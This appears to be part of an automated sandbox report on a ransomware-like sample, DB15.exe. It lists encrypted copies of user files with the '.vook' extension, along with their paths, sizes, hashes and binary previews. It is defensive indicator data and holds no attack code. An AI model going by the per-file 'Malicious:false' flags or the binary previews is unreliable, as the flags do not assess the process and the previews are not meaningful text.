                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844186748916949
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eLaVNKuX5zKfW9BKRQXYOVIb8Mm7C69rspv3w3dnZ0wL2iTkbD:eL04fUCQXY+48Mk1rspvA35biD
                                                                                                                                                                                                                                      MD5:90CAF2259A72F13D10718CFCFA0A93B4
                                                                                                                                                                                                                                      SHA1:DDF838E32F511B1E8B55C13C1FC679BC70321066
                                                                                                                                                                                                                                      SHA-256:9014500C58124B12E19449AD655F494546EC6648553BEC44BB218CB04D879D1E
                                                                                                                                                                                                                                      SHA-512:A41FEF4214242D0B97BE5817EE9C775B090F82A75226182D5CFCB932708AFCB4A74F2011C767BA5882AB929A2EA7AF8C0823FBD8E1C27CB7414396A9C8AAD765
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJY...k.....p$..Q..:...r.X..#.].1.....'.i...p.......L_...|.-eM.>(,...H]Bd.ZT....)....0+l..\.<'.^.h./.1i,..N....."....l@ke#.Mj.q.y.33.a&...Zp.. E...p|..+H...~..Qn.u..W5TV..1..e.Qg..c....F..4..<....s.X^....... ..t.U.....n.....$.s.@...D.Xm...'...\>.2......qDC.~.G...]P.......J.x.#..)!..c....!0.?>.B....mGr..a...I%.V..&...I...-R....%..M.k......E\..v$..y.2...-..4.@).\.ZbU.d.i.....7.....A.;t.U.V.T...Z..(8K.[.x[..]7.m.#.7.!..6Gs0..d.....7...(d..4 Ca.:..1J.^r.........M:..sl/.9..K..........a..7./..-.;,w.E.o...z+.......3..,p.>".U=.vju.K......v3.E.`.... y.$.=(.IJ.V.....>../mC...?og.93#lp.......1..#^.T}."...]\...>d.(..Wx.Q.q..v'.9|..t...|+..R......h?.x....Q......Z.w.9f.*v..M..L..;.S^[..1E..X.$t.C..IHY.H..}..w...=.D.etS...&rW1.-yS7!...^].Z....n.6........!K...J..\...'.b4.e.B..]q..e....|8...fp.q....-..$|.YtnC..py^.._.q..S.X..*..g.d.-q8...D.f..h[./..6I..U6d.8....pW]=D.+...Y.W|..B..3..k..&..v.`.!.p`....M...:.......B.+.@M.j..s.mrk=vY...>xp...V#.(.u4.3..~z..uN

                                                                                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.docx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.844186748916949
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:eLaVNKuX5zKfW9BKRQXYOVIb8Mm7C69rspv3w3dnZ0wL2iTkbD:eL04fUCQXY+48Mk1rspvA35biD
                                                                                                                                                                                                                                      MD5:90CAF2259A72F13D10718CFCFA0A93B4
                                                                                                                                                                                                                                      SHA1:DDF838E32F511B1E8B55C13C1FC679BC70321066
                                                                                                                                                                                                                                      SHA-256:9014500C58124B12E19449AD655F494546EC6648553BEC44BB218CB04D879D1E
                                                                                                                                                                                                                                      SHA-512:A41FEF4214242D0B97BE5817EE9C775B090F82A75226182D5CFCB932708AFCB4A74F2011C767BA5882AB929A2EA7AF8C0823FBD8E1C27CB7414396A9C8AAD765
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJY...k.....p$..Q..:...r.X..#.].1.....'.i...p.......L_...|.-eM.>(,...H]Bd.ZT....)....0+l..\.<'.^.h./.1i,..N....."....l@ke#.Mj.q.y.33.a&...Zp.. E...p|..+H...~..Qn.u..W5TV..1..e.Qg..c....F..4..<....s.X^....... ..t.U.....n.....$.s.@...D.Xm...'...\>.2......qDC.~.G...]P.......J.x.#..)!..c....!0.?>.B....mGr..a...I%.V..&...I...-R....%..M.k......E\..v$..y.2...-..4.@).\.ZbU.d.i.....7.....A.;t.U.V.T...Z..(8K.[.x[..]7.m.#.7.!..6Gs0..d.....7...(d..4 Ca.:..1J.^r.........M:..sl/.9..K..........a..7./..-.;,w.E.o...z+.......3..,p.>".U=.vju.K......v3.E.`.... y.$.=(.IJ.V.....>../mC...?og.93#lp.......1..#^.T}."...]\...>d.(..Wx.Q.q..v'.9|..t...|+..R......h?.x....Q......Z.w.9f.*v..M..L..;.S^[..1E..X.$t.C..IHY.H..}..w...=.D.etS...&rW1.-yS7!...^].Z....n.6........!K...J..\...'.b4.e.B..]q..e....|8...fp.q....-..$|.YtnC..py^.._.q..S.X..*..g.d.-q8...D.f..h[./..6I..U6d.8....pW]=D.+...Y.W|..B..3..k..&..v.`.!.p`....M...:.......B.+.@M.j..s.mrk=vY...>xp...V#.(.u4.3..~z..uN

                                                                                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.853017416744596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:M4DISS++k2Mq7zz3nrdMkRBXT4yrZ7OIUybr1xhs3hlvRL0q1u407w22iTkbD:cVXZ/zXrbRBXT4KVUybr1ns3hlZL0au4
                                                                                                                                                                                                                                      MD5:7C31B7D15C766014C14512FF1B0668AD
                                                                                                                                                                                                                                      SHA1:AF66FF43A6F0C0527BE3F320828B62C00B65269A
                                                                                                                                                                                                                                      SHA-256:DDEF7E42970FACE936D9769F4D81CE263AFAECE9AAED76973BBAF7B8C10CDD2F
                                                                                                                                                                                                                                      SHA-512:1DE1A5854249701FF83EBFBAB2B249F958E80D9A2BDB3AD59ED6AF6A21B1F94999ADDD76964B58325EB40006CC5E787A70652B220325A68D434BB9FF06701963
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJy(..D..=.......~^\."..E..~ej.X...1.xA.t......+~q.,*.9.k..R7..@.Ao.........N..b.....=...?oT*.c.EA...V.<......,S...5.....C.0.d.6..J.$....s`Kv..m..Ba.\....P.oe."m..}..+..Vio.S*.e...2...%.Ha...c.V.....8M.....{[...)R..bo...U..n..e!.3...$.f{1.Y..@..\.$@..t.b@.y.G.)...r.m/Kqe!/7....V......`......9JiA.....q..erj}...LrY....V. <I...\.'..0c....A..|..7..K.N.B.C.v.]...c.%.%"...p..ij.4.u...A..n..j.-w.....2..w0B>...KN.`YRe....OJ]..?.....-S|Z....]...L.p...H...^#..;..kB..........F'.....F..<H.|.,....#.d/[.......+X.........U7L4.).{...0..msu..I. ...V:..s.......D....z4..!......B.z56.c...Dy.].x...o......".....\W.....K..<.l...^...1MCu.....u%..PVt..xX>...9d.'.1A.PU..z.X. ...%....`.N..@...y..-........1.9... ...w1..v.....I.BS+.....c..;.`..i............,>/...[dI..l...U........../.=...,1Z+...=.;Q..x;.2.}.k.NO?V..TEj...;0}..*.TD.|S]...'2.:e9...+....HqA.8.=`6.....|?q. .a.I...5.!.P.......Z.wIS..:..83. ..M.8..#7........l...v6C..uE....gg.. ..;..=c....z....7+|...726.okbM..gK.AR

                                                                                                                                                                                                                                      C:\Users\user\Downloads\UOOJJOZIRH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.853017416744596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:M4DISS++k2Mq7zz3nrdMkRBXT4yrZ7OIUybr1xhs3hlvRL0q1u407w22iTkbD:cVXZ/zXrbRBXT4KVUybr1ns3hlZL0au4
                                                                                                                                                                                                                                      MD5:7C31B7D15C766014C14512FF1B0668AD
                                                                                                                                                                                                                                      SHA1:AF66FF43A6F0C0527BE3F320828B62C00B65269A
                                                                                                                                                                                                                                      SHA-256:DDEF7E42970FACE936D9769F4D81CE263AFAECE9AAED76973BBAF7B8C10CDD2F
                                                                                                                                                                                                                                      SHA-512:1DE1A5854249701FF83EBFBAB2B249F958E80D9A2BDB3AD59ED6AF6A21B1F94999ADDD76964B58325EB40006CC5E787A70652B220325A68D434BB9FF06701963
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:UOOJJy(..D..=.......~^\."..E..~ej.X...1.xA.t......+~q.,*.9.k..R7..@.Ao.........N..b.....=...?oT*.c.EA...V.<......,S...5.....C.0.d.6..J.$....s`Kv..m..Ba.\....P.oe."m..}..+..Vio.S*.e...2...%.Ha...c.V.....8M.....{[...)R..bo...U..n..e!.3...$.f{1.Y..@..\.$@..t.b@.y.G.)...r.m/Kqe!/7....V......`......9JiA.....q..erj}...LrY....V. <I...\.'..0c....A..|..7..K.N.B.C.v.]...c.%.%"...p..ij.4.u...A..n..j.-w.....2..w0B>...KN.`YRe....OJ]..?.....-S|Z....]...L.p...H...^#..;..kB..........F'.....F..<H.|.,....#.d/[.......+X.........U7L4.).{...0..msu..I. ...V:..s.......D....z4..!......B.z56.c...Dy.].x...o......".....\W.....K..<.l...^...1MCu.....u%..PVt..xX>...9d.'.1A.PU..z.X. ...%....`.N..@...y..-........1.9... ...w1..v.....I.BS+.....c..;.`..i............,>/...[dI..l...U........../.=...,1Z+...=.;Q..x;.2.}.k.NO?V..TEj...;0}..*.TD.|S]...'2.:e9...+....HqA.8.=`6.....|?q. .a.I...5.!.P.......Z.wIS..:..83. ..M.8..#7........l...v6C..uE....gg.. ..;..=c....z....7+|...726.okbM..gK.AR

                                                                                                                                                                                                                                      C:\Users\user\Downloads\ZQIXMVQGAH.jpg

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.862527541205605
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O5GB1NigFvCdTJBL09/xpXZm5uGHXJhJQy/tcrAtPneOpXKw2kLtyTwlAYVTiTkX:RCyCEMpBKVw2kLtykiumiD
                                                                                                                                                                                                                                      MD5:79EF43383E05E18218A308AC14957CAF
                                                                                                                                                                                                                                      SHA1:83BF32239BA969A30C0E1728312668685154C489
                                                                                                                                                                                                                                      SHA-256:0BF959BE02B5554F6ABD24067C6ADD10CC7B0EB6CDF48BA0FF8466E9E4E725DF
                                                                                                                                                                                                                                      SHA-512:30D5ECF568CC7AB5191B540C3418BE16233EBF2DDF879F7D71008AB293DF8CE31F6AF034936074181DD8349BB25F769DD7396D8A4FB5B5CF67B2C0B90C806BE3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM./..WN..M.+.......s.l.E>Z|.L..`..t&"....#3......C.I.......V0.P...m.~+.<..4J..s.7...O..j...iZ.(..\>.i....V.7.s..C.$..{.`K.s.L..+0..Ge..o...{...a.......`.H...H"..E./.{........ol..S..Q..!0..6..8.'..4H}$...^j.mL.....F..x.`K.......sg.*...<...>...e..<)..|j%j."^.01Xe:....F....x[.."jPa..t!.8._~=.A...tw8...Y...U.p....=....._.....3.......DG...j..HF........"..p..d.x..:...q..../.o...7.........P3..l.F\..#=.3......Rp....s.s@....P#I........O...=.*..N......| ..3.)...5~/.#..u..2.J..<...;7...=..<T.UC.......^`....|..[....AV.r.."......."<9B.&......#)~....!....C..-..._.......cO..4.W.F...;.5&.M.....D.A......r..i.{:x..uf..ww.V.".F.i..X..(Q.g\..&..)J^...gLul.`......4*K....../.4..{X..N......d.Tv......Ys.v&.z....5......R..B.2.l.=..kzP..,..W.....:..u.]..O6,.#....G...9.VU.{....@~......X....GU........]4.w.9....K.,D...D..J...^....2.V./....$..OxM.z........I.\I...+.?|......z:e....B.@k.....,A5..Q.U8.........}.m...O....d......ud%.P^&.~<...Ha..D4...D....k..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\ZQIXMVQGAH.jpg.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.862527541205605
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:O5GB1NigFvCdTJBL09/xpXZm5uGHXJhJQy/tcrAtPneOpXKw2kLtyTwlAYVTiTkX:RCyCEMpBKVw2kLtykiumiD
                                                                                                                                                                                                                                      MD5:79EF43383E05E18218A308AC14957CAF
                                                                                                                                                                                                                                      SHA1:83BF32239BA969A30C0E1728312668685154C489
                                                                                                                                                                                                                                      SHA-256:0BF959BE02B5554F6ABD24067C6ADD10CC7B0EB6CDF48BA0FF8466E9E4E725DF
                                                                                                                                                                                                                                      SHA-512:30D5ECF568CC7AB5191B540C3418BE16233EBF2DDF879F7D71008AB293DF8CE31F6AF034936074181DD8349BB25F769DD7396D8A4FB5B5CF67B2C0B90C806BE3
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM./..WN..M.+.......s.l.E>Z|.L..`..t&"....#3......C.I.......V0.P...m.~+.<..4J..s.7...O..j...iZ.(..\>.i....V.7.s..C.$..{.`K.s.L..+0..Ge..o...{...a.......`.H...H"..E./.{........ol..S..Q..!0..6..8.'..4H}$...^j.mL.....F..x.`K.......sg.*...<...>...e..<)..|j%j."^.01Xe:....F....x[.."jPa..t!.8._~=.A...tw8...Y...U.p....=....._.....3.......DG...j..HF........"..p..d.x..:...q..../.o...7.........P3..l.F\..#=.3......Rp....s.s@....P#I........O...=.*..N......| ..3.)...5~/.#..u..2.J..<...;7...=..<T.UC.......^`....|..[....AV.r.."......."<9B.&......#)~....!....C..-..._.......cO..4.W.F...;.5&.M.....D.A......r..i.{:x..uf..ww.V.".F.i..X..(Q.g\..&..)J^...gLul.`......4*K....../.4..{X..N......d.Tv......Ys.v&.z....5......R..B.2.l.=..kzP..,..W.....:..u.]..O6,.#....G...9.VU.{....@~......X....GU........]4.w.9....K.,D...D..J...^....2.V./....$..OxM.z........I.\I...+.?|......z:e....B.@k.....,A5..Q.U8.........}.m...O....d......ud%.P^&.~<...Ha..D4...D....k..

                                                                                                                                                                                                                                      C:\Users\user\Downloads\ZQIXMVQGAH.xlsx

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8325170760880045
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:5Pz876GCK+wJTw1YwKW5Jzou9kgcCb7F5YQwT25XB+exRbc9UBiTkbD:5bcZw1Yocg9F+e5jw9UAiD
                                                                                                                                                                                                                                      MD5:4F8A7743033D2C29FD77A1F514013EFA
                                                                                                                                                                                                                                      SHA1:35C389ACC5CB9A0B3EE165B9C2E41A2815F40D22
                                                                                                                                                                                                                                      SHA-256:088774B9DB51AC446AD803A203F738E074714E251CC26C16FD0E0F47127DA446
                                                                                                                                                                                                                                      SHA-512:29508BC11427BE8DDB44A874AEB36577AFE7CC990B265257A34BD9ACF98CD30BC3298D4352329D877B611CF17E567ABAA0695126131C3843C78A34C7ABC88952
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM..X.X..Db.=.....|.Una.%CuDv.Z$)a;...er+_..I...SC.".t..<W..9}u.I.=^...`...tc.[..G....?..,wA.9.Vk....?..'.Y....BYN...{6.^).F..G^..^....J......t.P....>J.|..LtZ....H)Y....Zn.......*....%...?.c...l.{..c..5.+Z.S.9mk ..@y....F(iy0..B....m...Z..b...JN..*.k.e..:m#.;|...G,PZ3X....y.&?..:.s,.@......n.*..].....&.#...j.J..........S...4^....v..J...vd..Fb..<.../~.[..mSA..E..z..3.B..~..... .Ga..Y..'.a....4.x..Y(..azm..[.Y=..b......L.@.......X.k......._<...Kp!..#b..........>|.(i4}.,....~^...Q.(3S.C.ztc4.+......6..c..;.|.!.....l..|..."...G.....D...~...%l............p.\.3V............n.......,..sjf..+...R..[.V.W..a.._...rR..d....}.).>.=...oNw.._.7....0..........h.......O.ew.qY......9.KQ...|%)nx..3.agq8<.X.....X...I.rs.......=.C..p..7$.c..;.J.c.M...5x..3.L.l..8.b....R..0...bQ.4.~".;b...0.@..X....../n...#.uG}..I.v....i&...W)..._}a..zC.....b....EW..`e._!.e0}s..Gg\33.1..kXQ.w.~...9.9n.......R< ....K.}......@N......qX.a/....<d..@.S.....t.N........y.A...z.

                                                                                                                                                                                                                                      C:\Users\user\Downloads\ZQIXMVQGAH.xlsx.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                      Entropy (8bit):7.8325170760880045
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:5Pz876GCK+wJTw1YwKW5Jzou9kgcCb7F5YQwT25XB+exRbc9UBiTkbD:5bcZw1Yocg9F+e5jw9UAiD
                                                                                                                                                                                                                                      MD5:4F8A7743033D2C29FD77A1F514013EFA
                                                                                                                                                                                                                                      SHA1:35C389ACC5CB9A0B3EE165B9C2E41A2815F40D22
                                                                                                                                                                                                                                      SHA-256:088774B9DB51AC446AD803A203F738E074714E251CC26C16FD0E0F47127DA446
                                                                                                                                                                                                                                      SHA-512:29508BC11427BE8DDB44A874AEB36577AFE7CC990B265257A34BD9ACF98CD30BC3298D4352329D877B611CF17E567ABAA0695126131C3843C78A34C7ABC88952
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:ZQIXM..X.X..Db.=.....|.Una.%CuDv.Z$)a;...er+_..I...SC.".t..<W..9}u.I.=^...`...tc.[..G....?..,wA.9.Vk....?..'.Y....BYN...{6.^).F..G^..^....J......t.P....>J.|..LtZ....H)Y....Zn.......*....%...?.c...l.{..c..5.+Z.S.9mk ..@y....F(iy0..B....m...Z..b...JN..*.k.e..:m#.;|...G,PZ3X....y.&?..:.s,.@......n.*..].....&.#...j.J..........S...4^....v..J...vd..Fb..<.../~.[..mSA..E..z..3.B..~..... .Ga..Y..'.a....4.x..Y(..azm..[.Y=..b......L.@.......X.k......._<...Kp!..#b..........>|.(i4}.,....~^...Q.(3S.C.ztc4.+......6..c..;.|.!.....l..|..."...G.....D...~...%l............p.\.3V............n.......,..sjf..+...R..[.V.W..a.._...rR..d....}.).>.=...oNw.._.7....0..........h.......O.ew.qY......9.KQ...|%)nx..3.agq8<.X.....X...I.rs.......=.C..p..7$.c..;.J.c.M...5x..3.L.l..8.b....R..0...bQ.4.~".;b...0.@..X....../n...#.uG}..I.v....i&...W)..._}a..zC.....b....EW..`e._!.e0}s..Gg\33.1..kXQ.w.~...9.9n.......R< ....K.}......@N......qX.a/....<d..@.S.....t.N........y.A...z.

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Amazon.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.360948522733461
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:w8yT/8n8LJda8hZGBZEIlZGGFqWEuLg6ixpZacii9a:w8IE8LNZknHG6PdziTkbD
                                                                                                                                                                                                                                      MD5:727CAE0B6CEF507C511404487944CC48
                                                                                                                                                                                                                                      SHA1:43FC2A3BCF5CF1431470F692ABA8AFB401F5BE3F
                                                                                                                                                                                                                                      SHA-256:A548982915E14FC70ADB9F26DD257E95ACB663F540F2B5AA92EB5A06EEA7BA81
                                                                                                                                                                                                                                      SHA-512:9E5FEC7628E36E3AABDD15C07DAADCBBC30D912FAE265E43FF2D2923903BBAEDD4D65CE3402F3DC00100C73629E5C38FC5DCDA73C75EB4DE9404FF03C96DA4FF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000jq.V..9.y.W.<.D....z.g...Y.Y.n<..r.[.....G......?..Y2\...m8.h.g".y_.~.r...........s..X<..?.........4..).....X.].x......'L...k...8...M.0.K(4 ....We.....5.....`..^.S.......@..y4Z.._kH....7u...K.uW.2.[.e4..b.v......{.?&*V..P...`^.#vK-..)t..%fvf[..1...M.a6..........D..[...6..r....s.v......C.`-.......b.s#ja.0~<..w3#._.wg._..6i[EV:..OA<v.KV.3.T..i.^.....T.j.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Amazon.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):445
                                                                                                                                                                                                                                      Entropy (8bit):7.360948522733461
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:w8yT/8n8LJda8hZGBZEIlZGGFqWEuLg6ixpZacii9a:w8IE8LNZknHG6PdziTkbD
                                                                                                                                                                                                                                      MD5:727CAE0B6CEF507C511404487944CC48
                                                                                                                                                                                                                                      SHA1:43FC2A3BCF5CF1431470F692ABA8AFB401F5BE3F
                                                                                                                                                                                                                                      SHA-256:A548982915E14FC70ADB9F26DD257E95ACB663F540F2B5AA92EB5A06EEA7BA81
                                                                                                                                                                                                                                      SHA-512:9E5FEC7628E36E3AABDD15C07DAADCBBC30D912FAE265E43FF2D2923903BBAEDD4D65CE3402F3DC00100C73629E5C38FC5DCDA73C75EB4DE9404FF03C96DA4FF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000jq.V..9.y.W.<.D....z.g...Y.Y.n<..r.[.....G......?..Y2\...m8.h.g".y_.~.r...........s..X<..?.........4..).....X.].x......'L...k...8...M.0.K(4 ....We.....5.....`..^.S.......@..y4Z.._kH....7u...K.uW.2.[.e4..b.v......{.?&*V..P...`^.#vK-..)t..%fvf[..1...M.a6..........D..[...6..r....s.v......C.`-.......b.s#ja.0~<..w3#._.wg._..6i[EV:..OA<v.KV.3.T..i.^.....T.j.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Bing.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):542
                                                                                                                                                                                                                                      Entropy (8bit):7.574448402195609
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:vP20JC3/yImvW7QRt4JU3riv3PG0tM+m8RhD5DjbmiLdmYHwYZixpZacii9a:veGC3/yImu7QnVm3uP+1D5/bxLnfiTkX
                                                                                                                                                                                                                                      MD5:9179579C3AFC4C327C02BDF352B19D29
                                                                                                                                                                                                                                      SHA1:9128A039166943A83D519FC415ADEDAB917F486F
                                                                                                                                                                                                                                      SHA-256:0E42E4E0B52ED7CA01BEB4D739CAD059D11489BDD8B8CE3E2B5BBF335A7378F7
                                                                                                                                                                                                                                      SHA-512:C009094565F04BD17C0D1D3498CF915B3EAC8A80E3A410CF5B3B202E735A5AEE3B1A384EC5BE66562939BA69C02AEF2AC46C2E7752D62258D6E0A9E40861CE2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000T..#E.Q.n...w.O #U...4\.EM!w;.%..d:f..v..7X......V...r.v....E....t..[g.0{E."^.p..fr...ZZ.:... ..S...,..z..v.J......ZrX..._.G..S......R-......n..y.-Z....Ww:...,o......r.4..t..}....n.<...^...k ...4.*eb..:..Mje..........=\.OR......Hs<.I.......].Y..$...*y.^IZ....`0JSh...+.6v'.!..T.C..D{k.o~.m.(....#AYP.S.......Z....X1.wUv.}i.?/....V.....I...l...Mll...<...3O..F.......f<..b.D...Uy.x.+u.Q...h.K(.[nm|.R.I........wU.......r(.F.o.'..?...7a.^Uf.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Bing.url.vook (copy)

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):542
                                                                                                                                                                                                                                      Entropy (8bit):7.574448402195609
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:vP20JC3/yImvW7QRt4JU3riv3PG0tM+m8RhD5DjbmiLdmYHwYZixpZacii9a:veGC3/yImu7QnVm3uP+1D5/bxLnfiTkX
                                                                                                                                                                                                                                      MD5:9179579C3AFC4C327C02BDF352B19D29
                                                                                                                                                                                                                                      SHA1:9128A039166943A83D519FC415ADEDAB917F486F
                                                                                                                                                                                                                                      SHA-256:0E42E4E0B52ED7CA01BEB4D739CAD059D11489BDD8B8CE3E2B5BBF335A7378F7
                                                                                                                                                                                                                                      SHA-512:C009094565F04BD17C0D1D3498CF915B3EAC8A80E3A410CF5B3B202E735A5AEE3B1A384EC5BE66562939BA69C02AEF2AC46C2E7752D62258D6E0A9E40861CE2C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000T..#E.Q.n...w.O #U...4\.EM!w;.%..d:f..v..7X......V...r.v....E....t..[g.0{E."^.p..fr...ZZ.:... ..S...,..z..v.J......ZrX..._.G..S......R-......n..y.-Z....Ww:...,o......r.4..t..}....n.<...^...k ...4.*eb..:..Mje..........=\.OR......Hs<.I.......].Y..$...*y.^IZ....`0JSh...+.6v'.!..T.C..D{k.o~.m.(....#AYP.S.......Z....X1.wUv.}i.?/....V.....I...l...Mll...<...3O..F.......f<..b.D...Uy.x.+u.Q...h.K(.[nm|.R.I........wU.......r(.F.o.'..?...7a.^Uf.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                                                                                      C:\Users\user\Favorites\Facebook.url

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):447
                                                                                                                                                                                                                                      Entropy (8bit):7.424716230764154
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:dWGFSwv1XGiUlJw9eJwafPuDE7UmGRNixpZacii9a:tUwZ6lGirPuiUxRNiTkbD
                                                                                                                                                                                                                                      MD5:614C396B5970BE922D713718EBD2ED96
                                                                                                                                                                                                                                      SHA1:2109B7FC003A2F0D501B21A267D3BAD8CAE63688
                                                                                                                                                                                                                                      SHA-256:1271741DC96120CB0504B6157EE1B0920D2A90F5DA58B7F8414F7D0279DFCF11
                                                                                                                                                                                                                                      SHA-512:D6011301ACAF31914AE98B1D0F803A85938774B0F6EDCDFA194D00E97C5093E5489580338A2BD2289928936E887B3ED11B5CF02C44C0A14FCCA85EC521AFE00C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Preview:[{000.J....Rw....&...m;7.'..j..]..;RZx....w.\..o)t!Fy.?..6.\N..2.N.H..]...!.,hI.P...5Ng...v..?#.55V.o:.;.....C....ZB........&#.l.5.#..-.(....41t..{9....;X........~..-M...^......n.f....q..h..u.7Qwt.}:.J...z.M....w.~TF.\..oH.'.1.s._....U..."..a....^.K..cM.3.q...........4#v.*....W..]..+.la...N?..h`QoR.....T].G.'.l.Z..rcD.....d....P.o,..#...Mf.F...Or6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

